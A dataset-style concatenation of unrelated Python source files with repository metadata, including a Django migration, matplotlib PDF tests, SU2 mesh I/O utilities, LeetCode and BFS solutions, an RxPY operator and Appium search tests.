from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('many_to_one', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='WPSUser',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=20)),
('instructor', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='many_to_one.WPSUser')),
],
),
]
| [
"pack122@naver.com"
] | pack122@naver.com |
359e4313843a6aecb4d74aa0c3a945078ffed7bf | 893f83189700fefeba216e6899d42097cc0bec70 | /webpage/lib/python3.5/site-packages/matplotlib/tests/test_backend_pdf.py | 2feee6fb1238014212e65e61b693ae6c6637cac5 | [
"MIT"
] | permissive | pseudoPixels/SciWorCS | 79249198b3dd2a2653d4401d0f028f2180338371 | e1738c8b838c71b18598ceca29d7c487c76f876b | refs/heads/master | 2021-06-10T01:08:30.242094 | 2018-12-06T18:53:34 | 2018-12-06T18:53:34 | 140,774,351 | 0 | 1 | MIT | 2021-06-01T22:23:47 | 2018-07-12T23:33:53 | Python | UTF-8 | Python | false | false | 4,488 | py | # -*- encoding: utf-8 -*-
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import six
import io
import os
import numpy as np
from matplotlib import cm, rcParams
from matplotlib.backends.backend_pdf import PdfPages
from matplotlib import pyplot as plt
from matplotlib.testing.decorators import (image_comparison, knownfailureif,
cleanup)
if 'TRAVIS' not in os.environ:
@image_comparison(baseline_images=['pdf_use14corefonts'],
extensions=['pdf'])
def test_use14corefonts():
rcParams['pdf.use14corefonts'] = True
rcParams['font.family'] = 'sans-serif'
rcParams['font.size'] = 8
rcParams['font.sans-serif'] = ['Helvetica']
rcParams['pdf.compression'] = 0
text = '''A three-line text positioned just above a blue line
and containing some French characters and the euro symbol:
"Merci pépé pour les 10 €"'''
@cleanup
def test_type42():
rcParams['pdf.fonttype'] = 42
fig = plt.figure()
ax = fig.add_subplot(111)
ax.plot([1, 2, 3])
fig.savefig(io.BytesIO())
@cleanup
def test_multipage_pagecount():
with PdfPages(io.BytesIO()) as pdf:
assert pdf.get_pagecount() == 0
fig = plt.figure()
ax = fig.add_subplot(111)
ax.plot([1, 2, 3])
fig.savefig(pdf, format="pdf")
assert pdf.get_pagecount() == 1
pdf.savefig()
assert pdf.get_pagecount() == 2
@cleanup
def test_multipage_keep_empty():
from matplotlib.backends.backend_pdf import PdfPages
from tempfile import NamedTemporaryFile
# test empty pdf files
# test that an empty pdf is left behind with keep_empty=True (default)
with NamedTemporaryFile(delete=False) as tmp:
with PdfPages(tmp) as pdf:
filename = pdf._file.fh.name
assert os.path.exists(filename)
os.remove(filename)
# test if an empty pdf is deleting itself afterwards with keep_empty=False
with PdfPages(filename, keep_empty=False) as pdf:
pass
assert not os.path.exists(filename)
# test pdf files with content, they should never be deleted
fig = plt.figure()
ax = fig.add_subplot(111)
ax.plot([1, 2, 3])
# test that a non-empty pdf is left behind with keep_empty=True (default)
with NamedTemporaryFile(delete=False) as tmp:
with PdfPages(tmp) as pdf:
filename = pdf._file.fh.name
pdf.savefig()
assert os.path.exists(filename)
os.remove(filename)
# test that a non-empty pdf is left behind with keep_empty=False
with NamedTemporaryFile(delete=False) as tmp:
with PdfPages(tmp, keep_empty=False) as pdf:
filename = pdf._file.fh.name
pdf.savefig()
assert os.path.exists(filename)
os.remove(filename)
@cleanup
def test_composite_image():
#Test that figures can be saved with and without combining multiple images
#(on a single set of axes) into a single composite image.
X, Y = np.meshgrid(np.arange(-5, 5, 1), np.arange(-5, 5, 1))
Z = np.sin(Y ** 2)
fig = plt.figure()
ax = fig.add_subplot(1, 1, 1)
ax.set_xlim(0, 3)
ax.imshow(Z, extent=[0, 1, 0, 1])
ax.imshow(Z[::-1], extent=[2, 3, 0, 1])
plt.rcParams['image.composite_image'] = True
with PdfPages(io.BytesIO()) as pdf:
fig.savefig(pdf, format="pdf")
assert len(pdf._file._images.keys()) == 1
plt.rcParams['image.composite_image'] = False
with PdfPages(io.BytesIO()) as pdf:
fig.savefig(pdf, format="pdf")
assert len(pdf._file._images.keys()) == 2
@image_comparison(baseline_images=['hatching_legend'],
extensions=['pdf'])
def test_hatching_legend():
"""Test for correct hatching on patches in legend"""
fig = plt.figure(figsize=(1, 2))
a = plt.Rectangle([0, 0], 0, 0, facecolor="green", hatch="XXXX")
b = plt.Rectangle([0, 0], 0, 0, facecolor="blue", hatch="XXXX")
fig.legend([a, b, a, b], ["", "", "", ""])
@image_comparison(baseline_images=['grayscale_alpha'],
extensions=['pdf'])
def test_grayscale_alpha():
"""Masking images with NaN did not work for grayscale images"""
x, y = np.ogrid[-2:2:.1, -2:2:.1]
dd = np.exp(-(x**2 + y**2))
dd[dd < .1] = np.nan
fig, ax = plt.subplots()
ax.imshow(dd, interpolation='none', cmap='gray_r')
ax.set_xticks([])
ax.set_yticks([])
| [
"golam.mostaeen@usask.ca"
] | golam.mostaeen@usask.ca |
54b4d3130aa1d007ebb68af85127de4f74fe2589 | 18b7f6e6a64ff4e33202f4c647d33240bf8ce015 | /Graph/Baek_1926.py | 3607ad4f55f10014997e3712a5551d0bbfe15fa5 | [] | no_license | qorjiwon/LevelUp-Algorithm | 80734b88e2543fb4b6da48377bb31b70d972b448 | 62a71552427290361e6ade9dcfe3ffc90a9d86e2 | refs/heads/master | 2023-06-16T16:33:44.427818 | 2021-03-12T14:39:25 | 2021-03-12T14:39:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,088 | py | """
@ Baek 1926. 그림
@ Prob. https://www.acmicpc.net/problem/1926
Ref.
@ Algo: 그래프(BFS)
@ Start day: 20. 03. 18.
@ End day: 20. 03. 18.
"""
from collections import deque
dx = [0, 0, -1, 1]
dy = [1, -1, 0, 0]
def BFS():
t = 1
q.append((i, j))
check[i][j] = 1
while q:
x, y = q.popleft()
for k in range(4):
nx, ny = x + dx[k], y + dy[k]
if 0 <= nx < N and 0 <= ny < M and MAP[nx][ny] == 1 and check[nx][ny] == 0:
check[nx][ny] = 1
q.append((nx, ny))
t += 1
return t
# N: 세로 M: 가로
N, M = map(int, input().split())
MAP = [list(map(int, input().split())) for _ in range(N)]
check = [[0] * M for _ in range(N)]
q = deque()
num_of_pic = 0
maxV = 0
for i in range(N):
for j in range(M):
if check[i][j] == 0 and MAP[i][j] == 1:
num_of_pic += 1
ret = BFS()
if ret > maxV: maxV = ret
print(num_of_pic)
print(maxV)
"""
6 5
1 1 0 1 1
0 1 1 0 0
0 0 0 0 0
1 0 1 1 1
0 0 1 1 1
0 0 1 1 1
>
4
9
""" | [
"21300035@handong.edu"
] | 21300035@handong.edu |
b3408d4959029e7cb7a05c3d3436095cd7e12f5e | 53983c1dbd4e27d918237d22287f1838ae42cc92 | /tools/SU2IO.py | 549c19ccdaa861824c8164b0755aec7d37de5e1e | [] | no_license | xshii/MDAOXS | da5060ea6b6ac600b3b85dddbb7460f62ab4a684 | d4c54b79d7c84740bf01d8e8573e54522de2e6d0 | refs/heads/master | 2021-09-24T10:35:31.295574 | 2018-10-08T10:54:44 | 2018-10-08T10:54:44 | 108,884,304 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 12,094 | py | #!/usr/bin/env python
## \file tools.py
# \brief mesh functions
# \author T. Lukaczyk, F. Palacios
# \version 6.0.0 "Falcon"
#
# The current SU2 release has been coordinated by the
# SU2 International Developers Society <www.su2devsociety.org>
# with selected contributions from the open-source community.
#
# The main research teams contributing to the current release are:
# - Prof. Juan J. Alonso's group at Stanford University.
# - Prof. Piero Colonna's group at Delft University of Technology.
# - Prof. Nicolas R. Gauger's group at Kaiserslautern University of Technology.
# - Prof. Alberto Guardone's group at Polytechnic University of Milan.
# - Prof. Rafael Palacios' group at Imperial College London.
# - Prof. Vincent Terrapon's group at the University of Liege.
# - Prof. Edwin van der Weide's group at the University of Twente.
# - Lab. of New Concepts in Aeronautics at Tech. Institute of Aeronautics.
#
# Copyright 2012-2018, Francisco D. Palacios, Thomas D. Economon,
# Tim Albring, and the SU2 contributors.
#
# SU2 is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# SU2 is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with SU2. If not, see <http://www.gnu.org/licenses/>.
import sys
if sys.version_info[0] > 2:
# In PY3, 'long' and 'int' are unified in 'int' type
long = int
# -------------------------------------------------------------------
# Imports
# -------------------------------------------------------------------
import numpy as np
from itertools import islice
# ----------------------------------------------------------------------
# Read SU2 Mesh File
# ----------------------------------------------------------------------
def read(filename, scale=1.0):
''' imports mesh and builds python dictionary structure
input: filename
scale: apply scaling factor (optional)
output:
meshdata mesh data dictionary
meshdata['NDIME'] number of dimensions
meshdata['NELEM'] number of elements
meshdata['ELEM'] element array [ type, nodes, index ]
meshdata['NPOIN'] number of points
meshdata['NMARK'] number of markers
meshdata['MARKS'] marker data dictionary
meshdata['MARKS']['tag_name'] marker data for 'tag_name'
meshdata['MARKS']['tag_name']['NELEM'] number of elements
meshdata['MARKS']['tag_name']['ELEM'] element array [type,nodes]
'''
# initialize variables
data = {}
marks = {}
# open meshfile
meshfile = open(filename, 'r')
# readline helper functin
def mesh_readlines(n_lines=1):
fileslice = islice(meshfile, n_lines)
return list(fileslice)
# scan file until end of file
keepon = True
while keepon:
# read line
line = mesh_readlines()
# stop if line is empty
if not line:
keepon = False
break
# fix white space
line = line[0]
line = line.replace('\t', ' ')
line = line.replace('\n', ' ')
# skip comments
if line[0] == "%":
pass
# number of dimensions
elif "NDIME=" in line:
# save to SU2_MESH data
data['NDIME'] = int(line.split("=")[1].strip())
#:if NDIME
# elements
elif "NELEM=" in line:
# number of elements
nelem = long(line.split("=")[1].strip())
# save to SU2_MESH data
data['NELEM'] = nelem
# only read nelem lines
fileslice = islice(meshfile, nelem)
# the data pattern
pattern = tuple([int] + [long] * 9)
# scan next lines for element data
elem = [
[t(s) for t, s in zip(pattern, line.split())]
for line in fileslice
]
# save to SU2_MESH data
data['ELEM'] = elem
#: if NELEM
# points
elif "NPOIN=" in line:
# number of points
npoin = long(line.split("=")[1].strip().split(' ')[0])
# save to SU2_MESH data
data['NPOIN'] = npoin
# only read npoin lines
fileslice = islice(meshfile, npoin)
# the data pattern
pattern = tuple([float] * 3) # + [long] )
# scan next lines for element data
poin = [
[t(s) for t, s in zip(pattern, line.split())]
for line in fileslice
]
# save to SU2_MESH data
data['POIN'] = poin
#:if NPOIN
# number of markers
elif "NMARK=" in line:
nmark = long(line.split("=")[1].strip())
# save to SU2_MESH data
data['NMARK'] = nmark
#:if NMARK
# a marker
elif "MARKER_TAG=" in line:
# marker tag
thistag = line.split("=")[1].strip()
# start SU2_MARK dictionary
thismark = {}
# save to SU2_MARK data
thismark['TAG'] = thistag
# read number of marker elements
line = mesh_readlines()[0]
if not "MARKER_ELEMS=" in line:
raise Exception("Marker Specification Error")
# convert string to long int
thisnelem = long(line.split("=")[1].strip())
# save to SU2_MARK data
thismark['NELEM'] = thisnelem
# only read thisnelem lines
fileslice = islice(meshfile, thisnelem)
# the data pattern
pattern = tuple([int] + [long] * 9)
# scan next lines for element data
markelem = [
[t(s) for t, s in zip(pattern, line.split())]
for line in fileslice
]
# save to SU2_MARK data
thismark['ELEM'] = markelem
# add to marker list
marks[thismark['TAG']] = thismark
#:if MARKER_TAG
#:while not end of file
# save to SU2_MESH data
data['MARKS'] = marks
return data
#: def read
# ----------------------------------------------------------------------
# Write SU2 Mesh File
# ----------------------------------------------------------------------
def write(filename, meshdata, scale=1.0):
''' writes meshdata to file
inputs: filename, meshdata
'''
# open file for writing
outputfile = open(filename, 'w')
# numbers
ndime = meshdata['NDIME']
# write dimension
outputfile.write("% \n% Problem Dimension \n% \n")
outputfile.write("NDIME= %i\n" % meshdata['NDIME'])
# write elements
outputfile.write("% \n% Inner element connectivity \n% \n")
outputfile.write("NELEM= %i\n" % meshdata['NELEM'])
for elem in meshdata['ELEM']:
for num in elem:
outputfile.write("%i " % num)
outputfile.write("\n")
# write nodes
outputfile.write("% \n% Node coordinates \n% \n")
outputfile.write("NPOIN= %i\n" % meshdata['NPOIN'])
for poin in meshdata['POIN']:
for inum in range(ndime):
outputfile.write("%#18.10e " % (poin[inum] * scale))
outputfile.write("%i\n" % (long(poin[inum + 1])))
# write markers
outputfile.write("% \n% Boundary elements \n% \n")
outputfile.write("NMARK= %i\n" % meshdata['NMARK'])
for mark_tag in meshdata['MARKS'].keys():
this_mark = meshdata['MARKS'][mark_tag]
outputfile.write("MARKER_TAG= %s\n" % this_mark['TAG'])
outputfile.write("MARKER_ELEMS= %i\n" % this_mark['NELEM'])
for elem in this_mark['ELEM']:
for num in elem:
outputfile.write("%i " % num)
outputfile.write("\n")
# close file
outputfile.close()
return
#: def write
# ----------------------------------------------------------------------
# Get Marker Mesh Points
# ----------------------------------------------------------------------
def get_markerPoints(meshdata, mark_tags):
''' pulls all mesh nodes on markers
checks for duplicates (from edges) '''
# marker tags should be a list
if not isinstance(mark_tags, list):
mark_tags = [mark_tags]
# some numbers
nmark = meshdata['NMARK']
ndim = meshdata['NDIME']
# list for marker node numbers
markernodes = []
# scan each marker
for this_tag in mark_tags:
# current mark
this_mark = meshdata['MARKS'][this_tag]
# marker elements
markelems = this_mark['ELEM']
# list for marker nodes
marknodes = [row[1:] for row in markelems]
# add to mesh node list
markernodes = markernodes + marknodes
#: for each marker
# unique check
# markernodes = dict(map(lambda i:(i,1),markernodes)).keys()
markernodes = np.hstack(markernodes)
markernodes = np.unique(markernodes)
markernodes = list(markernodes)
# list for marker points
markerpoints = [meshdata['POIN'][inode][0:ndim] for inode in markernodes]
return markerpoints, markernodes
#: def get_markerPoints()
# ----------------------------------------------------------------------
# Set Mesh Points
# ----------------------------------------------------------------------
def set_meshPoints(meshdata, meshnodes, meshpoints):
''' stores array of meshpoints in the meshdata structure
note: will operate on the input meshdata by pointer
if a new mesh is needed make a deep copy
before calling this function
'''
n_nodes = len(meshnodes)
n_dim = meshdata['NDIME']
# for each given node, update meshdata['POIN']
for ipoint in range(n_nodes):
inode = meshnodes[ipoint]
for iDim in range(n_dim):
meshdata['POIN'][inode][iDim] = meshpoints[ipoint][iDim]
return meshdata
# def: set_meshPoints
# ----------------------------------------------------------------------
# Sort Airfoil
# ----------------------------------------------------------------------
def sort_airfoil(mesh_data, marker_name):
''' sorts xy airfoil points in clockwise loop from trailing edge
returns list of mesh point indeces
assumes:
- airfoil oriented nearly parallel with x-axis
- oriented from leading to trailing edge in the +x-direction
- one airfoil element with name 'marker_name'
'''
# find airfoil elements and points
airfoil_elems = mesh_data['MARKS'][marker_name]['ELEM']
airfoil_elems = np.array(airfoil_elems)
airfoil_points = mesh_data['POIN']
airfoil_points = np.array(airfoil_points)
airfoil_points = airfoil_points[airfoil_elems[:, 1], :]
n_P, _ = airfoil_elems.shape
# build transfer arrays
EP = airfoil_elems[:, 1:3] # edge to point
PX = airfoil_points[:, 0:2] # point to coord
IP = np.arange(0, n_P) # loop index to point
# sorted airfoil point indeces tobe
Psort = np.zeros(n_P, long)
Isort = np.arange(0, n_P)
# find trailing edge
iP0 = np.argmax(PX[:, 0])
P0 = EP[iP0, 0]
I0 = IP[iP0]
Psort[0] = P0
# build loop
for this_iP in range(1, n_P):
P0 = EP[EP[:, 0] == P0, 1]
I0 = IP[EP[:, 0] == P0]
Psort[this_iP] = P0
Isort[this_iP] = I0
# check for clockwise
D1 = PX[Isort[1], 1] - PX[Isort[0], 1]
D2 = PX[Isort[-1], 1] - PX[Isort[0], 1]
if D1 > D2:
Psort = Psort[-1::-1]
# done
points_sorted = Psort
loop_sorted = Isort
return points_sorted, loop_sorted
# def: sort_airfoil() | [
"xshi@kth.se"
] | xshi@kth.se |
916af822d50ca0fafb9a6c3f5bb98ced51dfb76c | f8e8e365c9cf58b61d72655bc2340baeaed5baff | /Leetcode/Python Solutions/Math/ReachingPoints.py | 0ac3289c31b1e8936a326fe489c9a2da788ad09e | [
"MIT"
] | permissive | Mostofa-Najmus-Sakib/Applied-Algorithm | 39a69f6b9ed113efe4a420d19cad79e0aa317637 | bc656fd655617407856e0ce45b68585fa81c5035 | refs/heads/master | 2023-08-31T19:54:34.242559 | 2021-11-05T03:43:35 | 2021-11-05T03:43:35 | 412,263,430 | 0 | 0 | MIT | 2021-09-30T23:45:29 | 2021-09-30T23:45:25 | null | UTF-8 | Python | false | false | 865 | py | """
LeetCode Problem: 780. Reaching Points
Link: https://leetcode.com/problems/reaching-points/
Language: Python
Written by: Mostofa Adib Shakib
Time Complexity: O(max(tx,ty))
Space Complexity: O(1)
"""
class Solution:
def reachingPoints(self, sx: int, sy: int, tx: int, ty: int) -> bool:
# If tx is smaller than sx or if ty is smaller than sy, then there is no point in calculating as the answer would be False
if sx > tx or sy > ty:
return False
if sx == tx:
return (ty-sy)%sx == 0 # only change y
if sy == ty:
return (tx-sx)%sy == 0
if tx > ty:
return self.reachingPoints(sx, sy, tx%ty, ty) # make sure tx%ty < ty
elif tx < ty:
return self.reachingPoints(sx, sy, tx, ty%tx)
else:
return False | [
"adibshakib@gmail.com"
] | adibshakib@gmail.com |
8395fc7c7f92a208f8793b9f7b48c21bed9967d0 | 350db570521d3fc43f07df645addb9d6e648c17e | /0301_Remove_Invalid_Parentheses/solution_test.py | 2d7c1958b23dcdec8d5d9905ff2bd12cb4237244 | [] | no_license | benjaminhuanghuang/ben-leetcode | 2efcc9185459a1dd881c6e2ded96c42c5715560a | a2cd0dc5e098080df87c4fb57d16877d21ca47a3 | refs/heads/master | 2022-12-10T02:30:06.744566 | 2022-11-27T04:06:52 | 2022-11-27T04:06:52 | 236,252,145 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 384 | py |
'''
301. Remove Invalid Parentheses
Level: Hard
https://leetcode.com/problems/remove-invalid-parentheses
'''
import unittest
class TestSum(unittest.TestCase):
def test_sum(self):
self.assertEqual(sum([1, 2, 3]), 6, "Should be 6")
def test_sum_tuple(self):
self.assertEqual(sum((1, 2, 2)), 6, "Should be 6")
if __name__ == '__main__':
unittest.main() | [
"bhuang@rms.com"
] | bhuang@rms.com |
0f3b58683b7e2728255fccc69cf4195878792e65 | 28de04457e8ebcd1b34494db07bde8a3f25d8cf1 | /easy/symmetric_tree_101.py | 4480cfb339a9ab97cd6ab801aba0f4c8d142ae4b | [] | no_license | YangXinNewlife/LeetCode | 1df4218eef6b81db81bf2f0548d0a18bc9a5d672 | 20d3d0aa325d79c716acfc75daef32f8d4f9f1ad | refs/heads/master | 2023-08-16T23:18:29.776539 | 2023-08-15T15:53:30 | 2023-08-15T15:53:30 | 70,552,512 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,750 | py | # -*- coding:utf-8 -*-
__author__ = 'yangxin_ryan'
"""
Given a binary tree, check whether it is a mirror of itself (ie, symmetric around its center).
For example, this binary tree [1,2,2,3,4,4,3] is symmetric:
1
/ \
2 2
/ \ / \
3 4 4 3
But the following [1,2,2,null,3,null,3] is not:
1
/ \
2 2
\ \
3 3
Note:
Bonus points if you could solve it both recursively and iteratively.
Solution:
怎么判断一颗二叉树是Symmetric对称树
1.当root根节点为None的时候,为对称树。
2.当root根节点为非空,其左右孩子为None的时候,为对称树。
3.当root根节点为非空,其左或右孩子为None当时候,为非对称树。
4.当root根节点为非空,其左右孩子非空,但是左右孩子的val不相等的时候,为非对称树。
5.当root根节点为非空,其左右孩子非空,其左右孩子的val相等,那么再次调用函数去对比该左右孩子的左右孩子是否对称。
"""
class SymmetricTree(object):
def isSymmetric(self, root: TreeNode) -> bool:
"""
Definition for a binary tree node.
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
:param root:
:return:
"""
if root is None:
return True
return self.judge(root.left, root.right)
def judge(self, left, right):
if left is None and right is None:
return True
if left is None or right is None:
return False
if left.val != right.val:
return False
return self.judge(left.left, right.right) and self.judge(left.right, right.left)
| [
"yangxin03@youxin.com"
] | yangxin03@youxin.com |
fd63cd6e400939b33de938e5de18673f74a5eae9 | f3e1423c27467e2501a5443a8767a40141752acc | /rx/core/operators/concat.py | 6c9eb5d63777ff846850ba55cd0d0a5d577af32e | [
"MIT"
] | permissive | py-lab/RxPY | a08a16cbb381aed08485e0e2c36098884f3ba903 | ce12560f9481dbd0d072911e12ff2ed30be328bf | refs/heads/master | 2020-08-09T10:25:38.111773 | 2019-10-05T20:44:32 | 2019-10-05T20:44:32 | 214,068,251 | 0 | 1 | MIT | 2019-10-10T02:28:10 | 2019-10-10T02:28:09 | null | UTF-8 | Python | false | false | 605 | py | from typing import Callable
import rx
from rx.core import Observable
def _concat(*sources: Observable) -> Callable[[Observable], Observable]:
def concat(source: Observable) -> Observable:
"""Concatenates all the observable sequences.
Examples:
>>> op = concat(xs, ys, zs)
Returns:
An operator function that takes one or more observable sources and
returns an observable sequence that contains the elements of
each given sequence, in sequential order.
"""
return rx.concat(source, *sources)
return concat
| [
"dag@brattli.net"
] | dag@brattli.net |
af832263b949a29bb698b61d332031527b2055fb | 94560fcfd85bf81c326063ff035c593b2793863c | /asap/scripts/um_downsample_particles.py | 5e3e8b0b886b003c2d525ce23333a04b8689f99c | [
"Unlicense"
] | permissive | dr-guangtou/asap | 783a0607aea631c7d56ea9142e9e4f8505c3eac4 | 4b796b9708ee1a1d854d4ddf6d5c6e811941f55e | refs/heads/master | 2021-03-27T19:38:44.986573 | 2020-04-02T21:25:28 | 2020-04-02T21:25:28 | 111,163,115 | 2 | 0 | Unlicense | 2019-11-06T22:02:05 | 2017-11-18T00:20:30 | Jupyter Notebook | UTF-8 | Python | false | false | 2,339 | py | #!/usr/bin/env python
"""This script will read the dark matter particle table for the SMDPL
simulation, and downsample it for our model.
"""
import os
import argparse
import numpy as np
import pandas as pd
def downsample_particles(ptbl_file, n_million, seed=95064, csv=False, verbose=True):
"""Down-sample the partile files from the DM simulation."""
if not os.path.isfile(ptbl_file):
raise IOError("# Can not find the particle table : %s" % ptbl_file)
ptbl_pre, ptbl_ext = os.path.splitext(ptbl_file)
# Reduce the number of colunms and save as a numpy array
ptbl_out = ptbl_pre + "_downsample_%.1fm.npy" % n_million
if verbose:
print("# Save the downsampled catalog to : %s" % ptbl_out)
# Data format for output
particle_table_dtype = [
("x", "float64"), ("y", "float64"), ("z", "float64")]
if csv or ptbl_ext == '.csv':
use_csv = True
else:
use_csv = False
# Read the data
chunksize = 1000000
ptbl_pchunks = pd.read_csv(
ptbl_file, usecols=[0, 1, 2], delim_whitespace=use_csv,
names=['x', 'y', 'z', 'vx', 'vy', 'vz', 'id'],
dtype=particle_table_dtype, index_col=False,
chunksize=chunksize)
ptbl_pdframe = pd.concat(ptbl_pchunks)
ptbl_array = ptbl_pdframe.values.ravel().view(dtype=particle_table_dtype)
# Downsample
np.random.seed(seed)
ptbl_downsample = np.random.choice(ptbl_array, int(n_million * 1e6), replace=False)
# Save the result
np.save(ptbl_out, ptbl_downsample)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
'ptbl_file', type=str,
help=('The particle catalog.'))
parser.add_argument(
'n_million', type=float,
help=('Downsample the catalog to N x millions particles.'))
parser.add_argument(
'-s', '--seed', dest='seed',
help='Random seed',
type=int, default=95064)
parser.add_argument(
'-v', '--verbose', dest='verbose',
action="store_true", default=False)
parser.add_argument(
'-c', '--csv', dest='csv',
action="store_true", default=False)
args = parser.parse_args()
downsample_particles(args.ptbl_file, args.n_million,
csv=args.csv, seed=args.seed, verbose=args.verbose)
| [
"dr.guangtou@gmail.com"
] | dr.guangtou@gmail.com |
d4811b8ca1441d7078425d3f83304197fba009e7 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02393/s162472512.py | 2cf404e7460cb93fb79ee9ba11c0d04e33e900f5 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 100 | py | list=sorted([int(x) for x in input().split()])
print(str(list[0])+" "+str(list[1])+" "+str(list[2])) | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
81a3b8cf4112ab531cb3cfba9a91eded7429840b | fb1e852da0a026fb59c8cb24aeb40e62005501f1 | /kosmos-2/fairseq/fairseq/data/id_dataset.py | 3e4d7969cf2a26e852b466f165a6fadabae3b35f | [
"LicenseRef-scancode-unknown-license-reference",
"MIT",
"LGPL-2.1-or-later",
"LicenseRef-scancode-free-unknown",
"Apache-2.0"
] | permissive | microsoft/unilm | 134aa44867c5ed36222220d3f4fd9616d02db573 | b60c741f746877293bb85eed6806736fc8fa0ffd | refs/heads/master | 2023-08-31T04:09:05.779071 | 2023-08-29T14:07:57 | 2023-08-29T14:07:57 | 198,350,484 | 15,313 | 2,192 | MIT | 2023-08-19T11:33:20 | 2019-07-23T04:15:28 | Python | UTF-8 | Python | false | false | 423 | py | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import torch
from . import FairseqDataset
class IdDataset(FairseqDataset):
def __getitem__(self, index):
return index
def __len__(self):
return 0
def collater(self, samples):
return torch.tensor(samples)
| [
"1083127130@qq.com"
] | 1083127130@qq.com |
5a166c86274117ed654161b9db4ec8f72c03974e | d48aeeac74c02ae90d48c0994105027cee596f28 | /backend/bitter_fog_29287/wsgi.py | c1d64d470c8e7a5f73d506bb8bbeefaf596af81e | [] | no_license | crowdbotics-apps/bitter-fog-29287 | 6864b7668d09879d812d7438c580710b18c9958a | b24816c199dd45886c6ae563190fe1be731538be | refs/heads/master | 2023-07-02T14:52:19.004509 | 2021-07-30T15:43:54 | 2021-07-30T15:43:54 | 391,115,801 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 409 | py | """
WSGI config for bitter_fog_29287 project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'bitter_fog_29287.settings')
application = get_wsgi_application()
| [
"team@crowdbotics.com"
] | team@crowdbotics.com |
54e745ef71add4a8f93c5f04df6b32f38c5f29c8 | ee1dc4708fe2dbff1d528baf589255d8d39e56c0 | /0x0B-python-input_output/2-main.py | 64e107c075d3ce32ecbd0133c299ffd95538ae50 | [] | no_license | agzsoftsi/holbertonschool-higher_level_programming | f267991d6a917b9fc9dbd2f639394e9585bf33b6 | 89e37450d24e200cde3b29cde20b161e75723805 | refs/heads/master | 2021-07-03T15:16:30.381714 | 2021-03-01T16:36:11 | 2021-03-01T16:36:11 | 226,884,471 | 3 | 2 | null | null | null | null | UTF-8 | Python | false | false | 243 | py | #!/usr/bin/python3
read_lines = __import__('2-read_lines').read_lines
print("1 line:")
read_lines("my_file_0.txt", 1)
print("--")
print("3 lines:")
read_lines("my_file_0.txt", 3)
print("--")
print("Full content:")
read_lines("my_file_0.txt")
| [
"agzsoftsi@gmail.com"
] | agzsoftsi@gmail.com |
dabd42749c4135637d3896146d27573906923be0 | 69d8e789b289edfeb2fc18d0ef1c395bde9fb375 | /minDepth_111.py | 0366cd7558f4835563f6d3285240573c83501c3b | [] | no_license | Lucces/leetcode | d2db842eae7cdf1d7b9c56844660eb6f1940d88a | 2c3dbcbcb20cfdb276c0886e0193ef42551c5747 | refs/heads/master | 2021-01-19T05:59:04.712086 | 2016-08-29T13:33:00 | 2016-08-29T13:33:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 831 | py | #!/usr/bin/env python
# coding=utf-8
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
def minDepth(self, root):
"""
:type root: TreeNode
:rtype: int
"""
global min_depth
min_depth = float("Inf")
if root == None:
return 0
inorder_tree_walk(root, 0)
return min_depth
def inorder_tree_walk(node, depth):
global min_depth
depth += 1
if node.left == None and node.right == None:
if depth < min_depth:
min_depth = depth
if node.left != None:
inorder_tree_walk(node.left, depth)
if node.right != None:
inorder_tree_walk(node.right, depth)
| [
"cntqrxj@gmail.com"
] | cntqrxj@gmail.com |
a65d37fbf1e635195b611f139195ad869fb87991 | 5b34d998c7798b7cc1068680d89a977151c66c1a | /test_appium/testcase/test_search.py | eeeaf76cfc58728e01b79222be8efedc5438455b | [] | no_license | Hanlen520/Hogwarts_11 | e79a0de2508dd6801d46893271bcbc239edff3e8 | 805ee2586a25da1e710ba3acf63b5591dd76fcc6 | refs/heads/master | 2022-07-18T11:03:09.692778 | 2020-04-13T14:57:49 | 2020-04-13T14:57:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 787 | py | # !/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
@Project : Hogwarts_11
@File : test_search.py
@Time : 2020-03-30 10:30:18
@Author : indeyo_lin
"""
import pytest
from test_appium.page.app import App
class TestSearch:
def setup(self):
self.page = App().start().main().goto_search()
def test_search(self):
price = self.page.search("alibaba").get_price("BABA")
assert price < 200
@pytest.mark.parametrize("stock, stock_type, price", [
("alibaba", "BABA", 200),
("JD", "JD", 20)
])
def test_search_type(self, stock, stock_type, price):
assert self.page.search(stock).get_price(stock_type) > price
